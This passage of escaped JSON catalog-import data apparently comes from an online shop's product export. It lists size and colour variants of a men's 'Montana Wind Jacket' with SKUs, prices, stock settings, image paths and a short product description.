main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj03-black_alt1.jpg,\\/m\\/j\\/mj03-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"356\":{\"sku\":\"MJ03-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Montana Wind Jacket-S-Green\",\"description\":\"<p>Light-as-a-feather wind protection for runners, walkers and outdoor fitness buffs, the Montana Wind Jacket can be stuffed into your pocket for portable protection. Its stylish, move-with-you design makes it especially versatile.<\\/p>\\n<p>Adjustable hood. <br \\/>Split pocket. <br \\/>Thumb holes. <br \\/>Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"montana-wind-jacket-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"357\":{\"sku\":\"MJ03-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Montana Wind Jacket-S-Red\",\"description\":\"<p>Light-as-a-feather wind protection for runners, walkers and outdoor fitness buffs, the Montana Wind Jacket can be stuffed into your pocket for portable protection. Its stylish, move-with-you design makes it especially versatile.<\\/p>\\n<p>Adjustable hood. <br \\/>Split pocket. <br \\/>Thumb holes. <br \\/>Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"montana-wind-jacket-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"358\":{\"sku\":\"MJ03-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Montana Wind Jacket-M-Black\",\"description\":\"<p>Light-as-a-feather wind protection for runners, walkers and outdoor fitness buffs, the Montana Wind Jacket can be stuffed into your pocket for portable protection. Its stylish, move-with-you design makes it especially versatile.<\\/p>\\n<p>Adjustable hood. <br \\/>Split pocket. <br \\/>Thumb holes. <br \\/>Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"montana-wind-jacket-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj03-black_alt1.jpg,\\/m\\/j\\/mj03-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj03-black_alt1.jpg,\\/m\\/j\\/mj03-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"359\":{\"sku\":\"MJ03-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Montana Wind Jacket-M-Green\",\"description\":\"<p>Light-as-a-feather wind protection for runners, walkers and outdoor fitness buffs, the Montana Wind Jacket can be stuffed into your pocket for portable protection. Its stylish, move-with-you design makes it especially versatile.<\\/p>\\n<p>Adjustable hood. <br \\/>Split pocket. <br \\/>Thumb holes. <br \\/>Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"montana-wind-jacket-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"360\":{\"sku\":\"MJ03-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Montana Wind Jacket-M-Red\",\"description\":\"<p>Light-as-a-feather wind protection for runners, walkers and outdoor fitness buffs, the Montana Wind Jacket can be stuffed into your pocket for portable protection. Its stylish, move-with-you design makes it especially versatile.<\\/p>\\n<p>Adjustable hood. <br \\/>Split pocket. <br \\/>Thumb holes. <br \\/>Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"montana-wind-jacket-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"361\":{\"sku\":\"MJ03-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Montana Wind Jacket-L-Black\",\"description\":\"<p>Light-as-a-feather wind protection for runners, walkers and outdoor fitness buffs, the Montana Wind Jacket can be stuffed into your pocket for portable protection. Its stylish, move-with-you design makes it especially versatile.<\\/p>\\n<p>Adjustable hood. <br \\/>Split pocket. <br \\/>Thumb holes. <br \\/>Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"montana-wind-jacket-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj03-black_alt1.jpg,\\/m\\/j\\/mj03-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj03-black_alt1.jpg,\\/m\\/j\\/mj03-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"362\":{\"sku\":\"MJ03-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Montana Wind Jacket-L-Green\",\"description\":\"<p>Light-as-a-feather wind protection for runners, walkers and outdoor fitness buffs, the Montana Wind Jacket can be stuffed into your pocket for portable protection. Its stylish, move-with-you design makes it especially versatile.<\\/p>\\n<p>Adjustable hood. <br \\/>Split pocket. <br \\/>Thumb holes. <br \\/>Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"montana-wind-jacket-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"363\":{\"sku\":\"MJ03-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Montana Wind Jacket-L-Red\",\"description\":\"<p>Light-as-a-feather wind protection for runners, walkers and outdoor fitness buffs, the Montana Wind Jacket can be stuffed into your pocket for portable protection. Its stylish, move-with-you design makes it especially versatile.<\\/p>\\n<p>Adjustable hood. <br \\/>Split pocket. <br \\/>Thumb holes. <br \\/>Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"montana-wind-jacket-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"364\":{\"sku\":\"MJ03-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Montana Wind Jacket-XL-Black\",\"description\":\"<p>Light-as-a-feather wind protection for runners, walkers and outdoor fitness buffs, the Montana Wind Jacket can be stuffed into your pocket for portable protection. Its stylish, move-with-you design makes it especially versatile.<\\/p>\\n<p>Adjustable hood. <br \\/>Split pocket. <br \\/>Thumb holes. <br \\/>Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"montana-wind-jacket-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj03-black_alt1.jpg,\\/m\\/j\\/mj03-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj03-black_alt1.jpg,\\/m\\/j\\/mj03-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\